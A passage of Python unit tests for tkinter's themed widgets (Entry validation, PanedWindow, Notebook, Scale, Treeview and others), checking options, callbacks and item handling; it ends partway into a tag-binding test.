self.checkParam(widget, 'show', '')
self.checkParam(widget, 'show', ' ')
def test_state(self):
widget = self.create()
self.checkParams(widget, 'state',
'disabled', 'normal', 'readonly')
def test_validate(self):
widget = self.create()
self.checkEnumParam(widget, 'validate',
'all', 'key', 'focus', 'focusin', 'focusout', 'none')
def test_validatecommand(self):
widget = self.create()
self.checkCommandParam(widget, 'validatecommand')
def test_bbox(self):
self.assertIsBoundingBox(self.entry.bbox(0))
self.assertRaises(tkinter.TclError, self.entry.bbox, 'noindex')
self.assertRaises(tkinter.TclError, self.entry.bbox, None)
def test_identify(self):
self.entry.pack()
self.entry.wait_visibility()
self.entry.update_idletasks()
self.assertEqual(self.entry.identify(5, 5), "textarea")
self.assertEqual(self.entry.identify(-1, -1), "")
self.assertRaises(tkinter.TclError, self.entry.identify, None, 5)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, None)
self.assertRaises(tkinter.TclError, self.entry.identify, 5, '')
def test_validation_options(self):
success = []
test_invalid = lambda: success.append(True)
self.entry['validate'] = 'none'
self.entry['validatecommand'] = lambda: False
self.entry['invalidcommand'] = test_invalid
self.entry.validate()
self.assertTrue(success)
self.entry['invalidcommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['invalidcommand'] = test_invalid
self.entry['validatecommand'] = lambda: True
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = ''
self.entry.validate()
self.assertEqual(len(success), 1)
self.entry['validatecommand'] = True
self.assertRaises(tkinter.TclError, self.entry.validate)
def test_validation(self):
validation = []
def validate(to_insert):
if not 'a' <= to_insert.lower() <= 'z':
validation.append(False)
return False
validation.append(True)
return True
self.entry['validate'] = 'key'
self.entry['validatecommand'] = self.entry.register(validate), '%S'
self.entry.insert('end', 1)
self.entry.insert('end', 'a')
self.assertEqual(validation, [False, True])
self.assertEqual(self.entry.get(), 'a')
def test_revalidation(self):
def validate(content):
for letter in content:
if not 'a' <= letter.lower() <= 'z':
return False
return True
self.entry['validatecommand'] = self.entry.register(validate), '%P'
self.entry.insert('end', 'avocado')
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
self.entry.delete(0, 'end')
self.assertEqual(self.entry.get(), '')
self.entry.insert('end', 'a1b')
self.assertEqual(self.entry.validate(), False)
self.assertEqual(self.entry.state(), ('invalid', ))
self.entry.delete(1)
self.assertEqual(self.entry.validate(), True)
self.assertEqual(self.entry.state(), ())
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class PanedWindowTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height',
'orient', 'style', 'takefocus', 'width',
)
def setUp(self):
super().setUp()
self.paned = self.create()
def create(self, **kwargs):
return ttk.PanedWindow(self.root, **kwargs)
def test_orient(self):
widget = self.create()
self.assertEqual(str(widget['orient']), 'vertical')
errmsg='attempt to change read-only option'
if get_tk_patchlevel() < (8, 6, 0): # actually this was changed in 8.6b3
errmsg='Attempt to change read-only option'
self.checkInvalidParam(widget, 'orient', 'horizontal',
errmsg=errmsg)
widget2 = self.create(orient='horizontal')
self.assertEqual(str(widget2['orient']), 'horizontal')
def test_add(self):
# attempt to add a child that is not a direct child of the paned window
label = ttk.Label(self.paned)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
label.destroy()
child.destroy()
# another attempt
label = ttk.Label(self.root)
child = ttk.Label(label)
self.assertRaises(tkinter.TclError, self.paned.add, child)
child.destroy()
label.destroy()
good_child = ttk.Label(self.root)
self.paned.add(good_child)
# re-adding a child is not accepted
self.assertRaises(tkinter.TclError, self.paned.add, good_child)
other_child = ttk.Label(self.paned)
self.paned.add(other_child)
self.assertEqual(self.paned.pane(0), self.paned.pane(1))
self.assertRaises(tkinter.TclError, self.paned.pane, 2)
good_child.destroy()
other_child.destroy()
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.paned.forget, None)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
self.paned.add(ttk.Label(self.root))
self.paned.forget(0)
self.assertRaises(tkinter.TclError, self.paned.forget, 0)
def test_insert(self):
self.assertRaises(tkinter.TclError, self.paned.insert, None, 0)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, None)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, 0)
child = ttk.Label(self.root)
child2 = ttk.Label(self.root)
child3 = ttk.Label(self.root)
self.assertRaises(tkinter.TclError, self.paned.insert, 0, child)
self.paned.insert('end', child2)
self.paned.insert(0, child)
self.assertEqual(self.paned.panes(), (str(child), str(child2)))
self.paned.insert(0, child2)
self.assertEqual(self.paned.panes(), (str(child2), str(child)))
self.paned.insert('end', child3)
self.assertEqual(self.paned.panes(),
(str(child2), str(child), str(child3)))
# reinserting a child should move it to its current position
panes = self.paned.panes()
self.paned.insert('end', child3)
self.assertEqual(panes, self.paned.panes())
# moving child3 to child2 position should result in child2 ending up
# in previous child position and child ending up in previous child3
# position
self.paned.insert(child2, child3)
self.assertEqual(self.paned.panes(),
(str(child3), str(child2), str(child)))
def test_pane(self):
self.assertRaises(tkinter.TclError, self.paned.pane, 0)
child = ttk.Label(self.root)
self.paned.add(child)
self.assertIsInstance(self.paned.pane(0), dict)
self.assertEqual(self.paned.pane(0, weight=None),
0 if self.wantobjects else '0')
# newer form for querying a single option
self.assertEqual(self.paned.pane(0, 'weight'),
0 if self.wantobjects else '0')
self.assertEqual(self.paned.pane(0), self.paned.pane(str(child)))
self.assertRaises(tkinter.TclError, self.paned.pane, 0,
badoption='somevalue')
def test_sashpos(self):
self.assertRaises(tkinter.TclError, self.paned.sashpos, None)
self.assertRaises(tkinter.TclError, self.paned.sashpos, '')
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child = ttk.Label(self.paned, text='a')
self.paned.add(child, weight=1)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 0)
child2 = ttk.Label(self.paned, text='b')
self.paned.add(child2)
self.assertRaises(tkinter.TclError, self.paned.sashpos, 1)
self.paned.pack(expand=True, fill='both')
self.paned.wait_visibility()
curr_pos = self.paned.sashpos(0)
self.paned.sashpos(0, 1000)
self.assertNotEqual(curr_pos, self.paned.sashpos(0))
self.assertIsInstance(self.paned.sashpos(0), int)
@add_standard_options(StandardTtkOptionsTests)
class RadiobuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'compound', 'cursor',
'image',
'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'value', 'variable', 'width',
)
def create(self, **kwargs):
return ttk.Radiobutton(self.root, **kwargs)
def test_value(self):
widget = self.create()
self.checkParams(widget, 'value', 1, 2.3, '', 'any string')
def test_invoke(self):
success = []
def cb_test():
success.append(1)
return "cb test called"
myvar = tkinter.IntVar(self.root)
cbtn = ttk.Radiobutton(self.root, command=cb_test,
variable=myvar, value=0)
cbtn2 = ttk.Radiobutton(self.root, command=cb_test,
variable=myvar, value=1)
if self.wantobjects:
conv = lambda x: x
else:
conv = int
res = cbtn.invoke()
self.assertEqual(res, "cb test called")
self.assertEqual(conv(cbtn['value']), myvar.get())
self.assertEqual(myvar.get(),
conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertTrue(success)
cbtn2['command'] = ''
res = cbtn2.invoke()
self.assertEqual(str(res), '')
self.assertLessEqual(len(success), 1)
self.assertEqual(conv(cbtn2['value']), myvar.get())
self.assertEqual(myvar.get(),
conv(cbtn.tk.globalgetvar(cbtn['variable'])))
self.assertEqual(str(cbtn['variable']), str(cbtn2['variable']))
class MenubuttonTest(AbstractLabelTest, unittest.TestCase):
OPTIONS = (
'class', 'compound', 'cursor', 'direction',
'image', 'menu', 'state', 'style',
'takefocus', 'text', 'textvariable',
'underline', 'width',
)
def create(self, **kwargs):
return ttk.Menubutton(self.root, **kwargs)
def test_direction(self):
widget = self.create()
self.checkEnumParam(widget, 'direction',
'above', 'below', 'left', 'right', 'flush')
def test_menu(self):
widget = self.create()
menu = tkinter.Menu(widget, name='menu')
self.checkParam(widget, 'menu', menu, conv=str)
menu.destroy()
@add_standard_options(StandardTtkOptionsTests)
class ScaleTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'from', 'length',
'orient', 'style', 'takefocus', 'to', 'value', 'variable',
)
_conv_pixels = noconv
default_orient = 'horizontal'
def setUp(self):
super().setUp()
self.scale = self.create()
self.scale.pack()
self.scale.update()
def create(self, **kwargs):
return ttk.Scale(self.root, **kwargs)
def test_from(self):
widget = self.create()
self.checkFloatParam(widget, 'from', 100, 14.9, 15.1, conv=False)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 130, 131.2, 135.6, '5i')
def test_to(self):
widget = self.create()
self.checkFloatParam(widget, 'to', 300, 14.9, 15.1, -10, conv=False)
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 300, 14.9, 15.1, -10, conv=False)
def test_custom_event(self):
failure = [1, 1, 1] # will need to be empty
funcid = self.scale.bind('<<RangeChanged>>', lambda evt: failure.pop())
self.scale['from'] = 10
self.scale['from_'] = 10
self.scale['to'] = 3
self.assertFalse(failure)
failure = [1, 1, 1]
self.scale.configure(from_=2, to=5)
self.scale.configure(from_=0, to=-2)
self.scale.configure(to=10)
self.assertFalse(failure)
def test_get(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
scale_width = self.scale.winfo_width()
self.assertEqual(self.scale.get(scale_width, 0), self.scale['to'])
self.assertEqual(conv(self.scale.get(0, 0)), conv(self.scale['from']))
self.assertEqual(self.scale.get(), self.scale['value'])
self.scale['value'] = 30
self.assertEqual(self.scale.get(), self.scale['value'])
self.assertRaises(tkinter.TclError, self.scale.get, '', 0)
self.assertRaises(tkinter.TclError, self.scale.get, 0, '')
def test_set(self):
if self.wantobjects:
conv = lambda x: x
else:
conv = float
# set restricts the max/min values according to the current range
max = conv(self.scale['to'])
new_max = max + 10
self.scale.set(new_max)
self.assertEqual(conv(self.scale.get()), max)
min = conv(self.scale['from'])
self.scale.set(min - 1)
self.assertEqual(conv(self.scale.get()), min)
# changing directly the variable doesn't impose this limitation tho
var = tkinter.DoubleVar(self.root)
self.scale['variable'] = var
var.set(max + 5)
self.assertEqual(conv(self.scale.get()), var.get())
self.assertEqual(conv(self.scale.get()), max + 5)
del var
# the same happens with the value option
self.scale['value'] = max + 10
self.assertEqual(conv(self.scale.get()), max + 10)
self.assertEqual(conv(self.scale.get()), conv(self.scale['value']))
# nevertheless, note that the max/min values we can get specifying
# x, y coords are the ones according to the current range
self.assertEqual(conv(self.scale.get(0, 0)), min)
self.assertEqual(conv(self.scale.get(self.scale.winfo_width(), 0)), max)
self.assertRaises(tkinter.TclError, self.scale.set, None)
@add_standard_options(StandardTtkOptionsTests)
class ProgressbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'orient', 'length',
'mode', 'maximum', 'phase',
'style', 'takefocus', 'value', 'variable',
)
_conv_pixels = noconv
default_orient = 'horizontal'
def create(self, **kwargs):
return ttk.Progressbar(self.root, **kwargs)
def test_length(self):
widget = self.create()
self.checkPixelsParam(widget, 'length', 100.1, 56.7, '2i')
def test_maximum(self):
widget = self.create()
self.checkFloatParam(widget, 'maximum', 150.2, 77.7, 0, -10, conv=False)
def test_mode(self):
widget = self.create()
self.checkEnumParam(widget, 'mode', 'determinate', 'indeterminate')
def test_phase(self):
# XXX
pass
def test_value(self):
widget = self.create()
self.checkFloatParam(widget, 'value', 150.2, 77.7, 0, -10,
conv=False)
@unittest.skipIf(sys.platform == 'darwin',
'ttk.Scrollbar is special on MacOSX')
@add_standard_options(StandardTtkOptionsTests)
class ScrollbarTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'command', 'cursor', 'orient', 'style', 'takefocus',
)
default_orient = 'vertical'
def create(self, **kwargs):
return ttk.Scrollbar(self.root, **kwargs)
@add_standard_options(IntegerSizeTests, StandardTtkOptionsTests)
class NotebookTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'cursor', 'height', 'padding', 'style', 'takefocus',
)
def setUp(self):
super().setUp()
self.nb = self.create(padding=0)
self.child1 = ttk.Label(self.root)
self.child2 = ttk.Label(self.root)
self.nb.add(self.child1, text='a')
self.nb.add(self.child2, text='b')
def create(self, **kwargs):
return ttk.Notebook(self.root, **kwargs)
def test_tab_identifiers(self):
self.nb.forget(0)
self.nb.hide(self.child2)
self.assertRaises(tkinter.TclError, self.nb.tab, self.child1)
self.assertEqual(self.nb.index('end'), 1)
self.nb.add(self.child2)
self.assertEqual(self.nb.index('end'), 1)
self.nb.select(self.child2)
self.assertTrue(self.nb.tab('current'))
self.nb.add(self.child1, text='a')
self.nb.pack()
self.nb.wait_visibility()
if sys.platform == 'darwin':
tb_idx = "@20,5"
else:
tb_idx = "@5,5"
self.assertEqual(self.nb.tab(tb_idx), self.nb.tab('current'))
for i in range(5, 100, 5):
try:
if self.nb.tab('@%d, 5' % i, text=None) == 'a':
break
except tkinter.TclError:
pass
else:
self.fail("Tab with text 'a' not found")
def test_add_and_hidden(self):
self.assertRaises(tkinter.TclError, self.nb.hide, -1)
self.assertRaises(tkinter.TclError, self.nb.hide, 'hi')
self.assertRaises(tkinter.TclError, self.nb.hide, None)
self.assertRaises(tkinter.TclError, self.nb.add, None)
self.assertRaises(tkinter.TclError, self.nb.add, ttk.Label(self.root),
unknown='option')
tabs = self.nb.tabs()
self.nb.hide(self.child1)
self.nb.add(self.child1)
self.assertEqual(self.nb.tabs(), tabs)
child = ttk.Label(self.root)
self.nb.add(child, text='c')
tabs = self.nb.tabs()
curr = self.nb.index('current')
# verify that the tab gets readded at its previous position
child2_index = self.nb.index(self.child2)
self.nb.hide(self.child2)
self.nb.add(self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.assertEqual(self.nb.index(self.child2), child2_index)
self.assertEqual(str(self.child2), self.nb.tabs()[child2_index])
# but the tab next to it (not hidden) is the one selected now
self.assertEqual(self.nb.index('current'), curr + 1)
def test_forget(self):
self.assertRaises(tkinter.TclError, self.nb.forget, -1)
self.assertRaises(tkinter.TclError, self.nb.forget, 'hi')
self.assertRaises(tkinter.TclError, self.nb.forget, None)
tabs = self.nb.tabs()
child1_index = self.nb.index(self.child1)
self.nb.forget(self.child1)
self.assertNotIn(str(self.child1), self.nb.tabs())
self.assertEqual(len(tabs) - 1, len(self.nb.tabs()))
self.nb.add(self.child1)
self.assertEqual(self.nb.index(self.child1), 1)
self.assertNotEqual(child1_index, self.nb.index(self.child1))
def test_index(self):
self.assertRaises(tkinter.TclError, self.nb.index, -1)
self.assertRaises(tkinter.TclError, self.nb.index, None)
self.assertIsInstance(self.nb.index('end'), int)
self.assertEqual(self.nb.index(self.child1), 0)
self.assertEqual(self.nb.index(self.child2), 1)
self.assertEqual(self.nb.index('end'), 2)
def test_insert(self):
# moving tabs
tabs = self.nb.tabs()
self.nb.insert(1, tabs[0])
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert(self.child1, self.child2)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert('end', self.child1)
self.assertEqual(self.nb.tabs(), (tabs[1], tabs[0]))
self.nb.insert('end', 0)
self.assertEqual(self.nb.tabs(), tabs)
# bad moves
self.assertRaises(tkinter.TclError, self.nb.insert, 2, tabs[0])
self.assertRaises(tkinter.TclError, self.nb.insert, -1, tabs[0])
# new tab
child3 = ttk.Label(self.root)
self.nb.insert(1, child3)
self.assertEqual(self.nb.tabs(), (tabs[0], str(child3), tabs[1]))
self.nb.forget(child3)
self.assertEqual(self.nb.tabs(), tabs)
self.nb.insert(self.child1, child3)
self.assertEqual(self.nb.tabs(), (str(child3), ) + tabs)
self.nb.forget(child3)
self.assertRaises(tkinter.TclError, self.nb.insert, 2, child3)
self.assertRaises(tkinter.TclError, self.nb.insert, -1, child3)
# bad inserts
self.assertRaises(tkinter.TclError, self.nb.insert, 'end', None)
self.assertRaises(tkinter.TclError, self.nb.insert, None, 0)
self.assertRaises(tkinter.TclError, self.nb.insert, None, None)
def test_select(self):
self.nb.pack()
self.nb.wait_visibility()
success = []
tab_changed = []
self.child1.bind('<Unmap>', lambda evt: success.append(True))
self.nb.bind('<<NotebookTabChanged>>',
lambda evt: tab_changed.append(True))
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.select(self.child2)
self.assertTrue(success)
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.update()
self.assertTrue(tab_changed)
def test_tab(self):
self.assertRaises(tkinter.TclError, self.nb.tab, -1)
self.assertRaises(tkinter.TclError, self.nb.tab, 'notab')
self.assertRaises(tkinter.TclError, self.nb.tab, None)
self.assertIsInstance(self.nb.tab(self.child1), dict)
self.assertEqual(self.nb.tab(self.child1, text=None), 'a')
# newer form for querying a single option
self.assertEqual(self.nb.tab(self.child1, 'text'), 'a')
self.nb.tab(self.child1, text='abc')
self.assertEqual(self.nb.tab(self.child1, text=None), 'abc')
self.assertEqual(self.nb.tab(self.child1, 'text'), 'abc')
def test_tabs(self):
self.assertEqual(len(self.nb.tabs()), 2)
self.nb.forget(self.child1)
self.nb.forget(self.child2)
self.assertEqual(self.nb.tabs(), ())
def test_traversal(self):
self.nb.pack()
self.nb.wait_visibility()
self.nb.select(0)
simulate_mouse_click(self.nb, 5, 5)
self.nb.focus_force()
self.nb.event_generate('<Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child1))
self.nb.focus_force()
self.nb.event_generate('<Shift-Control-Tab>')
self.assertEqual(self.nb.select(), str(self.child2))
self.nb.tab(self.child1, text='a', underline=0)
self.nb.enable_traversal()
self.nb.focus_force()
simulate_mouse_click(self.nb, 5, 5)
if sys.platform == 'darwin':
self.nb.event_generate('<Option-a>')
else:
self.nb.event_generate('<Alt-a>')
self.assertEqual(self.nb.select(), str(self.child1))
@add_standard_options(StandardTtkOptionsTests)
class TreeviewTest(AbstractWidgetTest, unittest.TestCase):
OPTIONS = (
'class', 'columns', 'cursor', 'displaycolumns',
'height', 'padding', 'selectmode', 'show',
'style', 'takefocus', 'xscrollcommand', 'yscrollcommand',
)
def setUp(self):
super().setUp()
self.tv = self.create(padding=0)
def create(self, **kwargs):
return ttk.Treeview(self.root, **kwargs)
def test_columns(self):
widget = self.create()
self.checkParam(widget, 'columns', 'a b c',
expected=('a', 'b', 'c'))
self.checkParam(widget, 'columns', ('a', 'b', 'c'))
self.checkParam(widget, 'columns', ())
def test_displaycolumns(self):
widget = self.create()
widget['columns'] = ('a', 'b', 'c')
self.checkParam(widget, 'displaycolumns', 'b a c',
expected=('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', ('b', 'a', 'c'))
self.checkParam(widget, 'displaycolumns', '#all',
expected=('#all',))
self.checkParam(widget, 'displaycolumns', (2, 1, 0))
self.checkInvalidParam(widget, 'displaycolumns', ('a', 'b', 'd'),
errmsg='Invalid column index d')
self.checkInvalidParam(widget, 'displaycolumns', (1, 2, 3),
errmsg='Column index 3 out of bounds')
self.checkInvalidParam(widget, 'displaycolumns', (1, -2),
errmsg='Column index -2 out of bounds')
def test_height(self):
widget = self.create()
self.checkPixelsParam(widget, 'height', 100, -100, 0, '3c', conv=False)
self.checkPixelsParam(widget, 'height', 101.2, 102.6, conv=noconv)
def test_selectmode(self):
widget = self.create()
self.checkEnumParam(widget, 'selectmode',
'none', 'browse', 'extended')
def test_show(self):
widget = self.create()
self.checkParam(widget, 'show', 'tree headings',
expected=('tree', 'headings'))
self.checkParam(widget, 'show', ('tree', 'headings'))
self.checkParam(widget, 'show', ('headings', 'tree'))
self.checkParam(widget, 'show', 'tree', expected=('tree',))
self.checkParam(widget, 'show', 'headings', expected=('headings',))
def test_bbox(self):
self.tv.pack()
self.assertEqual(self.tv.bbox(''), '')
self.tv.wait_visibility()
self.tv.update()
item_id = self.tv.insert('', 'end')
children = self.tv.get_children()
self.assertTrue(children)
bbox = self.tv.bbox(children[0])
self.assertIsBoundingBox(bbox)
# compare width in bboxes
self.tv['columns'] = ['test']
self.tv.column('test', width=50)
bbox_column0 = self.tv.bbox(children[0], 0)
root_width = self.tv.column('#0', width=None)
if not self.wantobjects:
root_width = int(root_width)
self.assertEqual(bbox_column0[0], bbox[0] + root_width)
# verify that bbox of a closed item is the empty string
child1 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.bbox(child1), '')
def test_children(self):
# no children yet, should get an empty tuple
self.assertEqual(self.tv.get_children(), ())
item_id = self.tv.insert('', 'end')
self.assertIsInstance(self.tv.get_children(), tuple)
self.assertEqual(self.tv.get_children()[0], item_id)
# add item_id and child3 as children of child2
child2 = self.tv.insert('', 'end')
child3 = self.tv.insert('', 'end')
self.tv.set_children(child2, item_id, child3)
self.assertEqual(self.tv.get_children(child2), (item_id, child3))
# child3 has child2 as parent, thus trying to set child2 as a children
# of child3 should result in an error
self.assertRaises(tkinter.TclError,
self.tv.set_children, child3, child2)
# remove child2 children
self.tv.set_children(child2)
self.assertEqual(self.tv.get_children(child2), ())
# remove root's children
self.tv.set_children('')
self.assertEqual(self.tv.get_children(), ())
def test_column(self):
# return a dict with all options/values
self.assertIsInstance(self.tv.column('#0'), dict)
# return a single value of the given option
if self.wantobjects:
self.assertIsInstance(self.tv.column('#0', width=None), int)
# set a new value for an option
self.tv.column('#0', width=10)
# testing new way to get option value
self.assertEqual(self.tv.column('#0', 'width'),
10 if self.wantobjects else '10')
self.assertEqual(self.tv.column('#0', width=None),
10 if self.wantobjects else '10')
# check read-only option
self.assertRaises(tkinter.TclError, self.tv.column, '#0', id='X')
self.assertRaises(tkinter.TclError, self.tv.column, 'invalid')
invalid_kws = [
{'unknown_option': 'some value'}, {'stretch': 'wrong'},
{'anchor': 'wrong'}, {'width': 'wrong'}, {'minwidth': 'wrong'}
]
for kw in invalid_kws:
self.assertRaises(tkinter.TclError, self.tv.column, '#0',
**kw)
def test_delete(self):
self.assertRaises(tkinter.TclError, self.tv.delete, '#0')
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
self.tv.delete(item_id)
self.assertFalse(self.tv.get_children())
# reattach should fail
self.assertRaises(tkinter.TclError,
self.tv.reattach, item_id, '', 'end')
# test multiple item delete
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
self.assertEqual(self.tv.get_children(), (item1, item2))
self.tv.delete(item1, item2)
self.assertFalse(self.tv.get_children())
def test_detach_reattach(self):
item_id = self.tv.insert('', 'end')
item2 = self.tv.insert(item_id, 'end')
# calling detach without items is valid, although it does nothing
prev = self.tv.get_children()
self.tv.detach() # this should do nothing
self.assertEqual(prev, self.tv.get_children())
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
# detach item with children
self.tv.detach(item_id)
self.assertFalse(self.tv.get_children())
# reattach item with children
self.tv.reattach(item_id, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, ))
self.assertEqual(self.tv.get_children(item_id), (item2, ))
# move a children to the root
self.tv.move(item2, '', 'end')
self.assertEqual(self.tv.get_children(), (item_id, item2))
self.assertEqual(self.tv.get_children(item_id), ())
# bad values
self.assertRaises(tkinter.TclError,
self.tv.reattach, 'nonexistent', '', 'end')
self.assertRaises(tkinter.TclError,
self.tv.detach, 'nonexistent')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, 'otherparent', 'end')
self.assertRaises(tkinter.TclError,
self.tv.reattach, item2, '', 'invalid')
# multiple detach
self.tv.detach(item_id, item2)
self.assertEqual(self.tv.get_children(), ())
self.assertEqual(self.tv.get_children(item_id), ())
def test_exists(self):
self.assertEqual(self.tv.exists('something'), False)
self.assertEqual(self.tv.exists(''), True)
self.assertEqual(self.tv.exists({}), False)
# the following will make a tk.call equivalent to
# tk.call(treeview, "exists") which should result in an error
# in the tcl interpreter since tk requires an item.
self.assertRaises(tkinter.TclError, self.tv.exists, None)
def test_focus(self):
# nothing is focused right now
self.assertEqual(self.tv.focus(), '')
item1 = self.tv.insert('', 'end')
self.tv.focus(item1)
self.assertEqual(self.tv.focus(), item1)
self.tv.delete(item1)
self.assertEqual(self.tv.focus(), '')
# try focusing inexistent item
self.assertRaises(tkinter.TclError, self.tv.focus, 'hi')
def test_heading(self):
# check a dict is returned
self.assertIsInstance(self.tv.heading('#0'), dict)
# check a value is returned
self.tv.heading('#0', text='hi')
self.assertEqual(self.tv.heading('#0', 'text'), 'hi')
self.assertEqual(self.tv.heading('#0', text=None), 'hi')
# invalid option
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
background=None)
# invalid value
self.assertRaises(tkinter.TclError, self.tv.heading, '#0',
anchor=1)
def test_heading_callback(self):
def simulate_heading_click(x, y):
simulate_mouse_click(self.tv, x, y)
self.tv.update()
success = [] # no success for now
self.tv.pack()
self.tv.wait_visibility()
self.tv.heading('#0', command=lambda: success.append(True))
self.tv.column('#0', width=100)
self.tv.update()
# assuming that the coords (5, 5) fall into heading #0
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
success = []
commands = self.tv.master._tclCommands
self.tv.heading('#0', command=str(self.tv.heading('#0', command=None)))
self.assertEqual(commands, self.tv.master._tclCommands)
simulate_heading_click(5, 5)
if not success:
self.fail("The command associated to the treeview heading wasn't "
"invoked.")
# XXX The following raises an error in a tcl interpreter, but not in
# Python
#self.tv.heading('#0', command='I dont exist')
#simulate_heading_click(5, 5)
def test_index(self):
# item 'what' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.index, 'what')
self.assertEqual(self.tv.index(''), 0)
item1 = self.tv.insert('', 'end')
item2 = self.tv.insert('', 'end')
c1 = self.tv.insert(item1, 'end')
c2 = self.tv.insert(item1, 'end')
self.assertEqual(self.tv.index(item1), 0)
self.assertEqual(self.tv.index(c1), 0)
self.assertEqual(self.tv.index(c2), 1)
self.assertEqual(self.tv.index(item2), 1)
self.tv.move(item2, '', 0)
self.assertEqual(self.tv.index(item2), 0)
self.assertEqual(self.tv.index(item1), 1)
# check that index still works even after its parent and siblings
# have been detached
self.tv.detach(item1)
self.assertEqual(self.tv.index(c2), 1)
self.tv.detach(c1)
self.assertEqual(self.tv.index(c2), 0)
# but it fails after item has been deleted
self.tv.delete(item1)
self.assertRaises(tkinter.TclError, self.tv.index, c2)
def test_insert_item(self):
# parent 'none' doesn't exist
self.assertRaises(tkinter.TclError, self.tv.insert, 'none', 'end')
# open values
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
open='please')
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=True)))
self.assertFalse(self.tv.delete(self.tv.insert('', 'end', open=False)))
# invalid index
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'middle')
# trying to duplicate item id is invalid
itemid = self.tv.insert('', 'end', 'first-item')
self.assertEqual(itemid, 'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
'first-item')
self.assertRaises(tkinter.TclError, self.tv.insert, '', 'end',
MockTclObj('first-item'))
# unicode values
value = '\xe1ba'
item = self.tv.insert('', 'end', values=(value, ))
self.assertEqual(self.tv.item(item, 'values'),
(value,) if self.wantobjects else value)
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.tv.item(item, values=self.root.splitlist(self.tv.item(item, values=None)))
self.assertEqual(self.tv.item(item, values=None),
(value,) if self.wantobjects else value)
self.assertIsInstance(self.tv.item(item), dict)
# erase item values
self.tv.item(item, values='')
self.assertFalse(self.tv.item(item, values=None))
# item tags
item = self.tv.insert('', 'end', tags=[1, 2, value])
self.assertEqual(self.tv.item(item, tags=None),
('1', '2', value) if self.wantobjects else
'1 2 %s' % value)
self.tv.item(item, tags=[])
self.assertFalse(self.tv.item(item, tags=None))
self.tv.item(item, tags=(1, 2))
self.assertEqual(self.tv.item(item, tags=None),
('1', '2') if self.wantobjects else '1 2')
# values with spaces
item = self.tv.insert('', 'end', values=('a b c',
'%s %s' % (value, value)))
self.assertEqual(self.tv.item(item, values=None),
('a b c', '%s %s' % (value, value)) if self.wantobjects else
'{a b c} {%s %s}' % (value, value))
# text
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text="Label here"), text=None),
"Label here")
self.assertEqual(self.tv.item(
self.tv.insert('', 'end', text=value), text=None),
value)
def test_set(self):
self.tv['columns'] = ['A', 'B']
item = self.tv.insert('', 'end', values=['a', 'b'])
self.assertEqual(self.tv.set(item), {'A': 'a', 'B': 'b'})
self.tv.set(item, 'B', 'a')
self.assertEqual(self.tv.item(item, values=None),
('a', 'a') if self.wantobjects else 'a a')
self.tv['columns'] = ['B']
self.assertEqual(self.tv.set(item), {'B': 'a'})
self.tv.set(item, 'B', 'b')
self.assertEqual(self.tv.set(item, column='B'), 'b')
self.assertEqual(self.tv.item(item, values=None),
('b', 'a') if self.wantobjects else 'b a')
self.tv.set(item, 'B', 123)
self.assertEqual(self.tv.set(item, 'B'),
123 if self.wantobjects else '123')
self.assertEqual(self.tv.item(item, values=None),
(123, 'a') if self.wantobjects else '123 a')
self.assertEqual(self.tv.set(item),
{'B': 123} if self.wantobjects else {'B': '123'})
# inexistent column
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A')
self.assertRaises(tkinter.TclError, self.tv.set, item, 'A', 'b')
# inexistent item
self.assertRaises(tkinter.TclError, self.tv.set, 'notme')
def test_tag_bind(self):
events = []
